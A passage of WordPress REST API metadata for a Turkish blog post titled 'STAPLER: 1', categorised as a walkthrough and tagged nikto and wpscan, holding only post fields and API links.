href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/30\/stapler-1\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">STAPLER: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[508,507],"class_list":["post-1150","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-nikto","tag-wpscan","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1150"}],"version-history":[{"count":3,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150\/revisions"}],"predecessor-version":[{"id":1154,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1150\/revisions\/1154"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}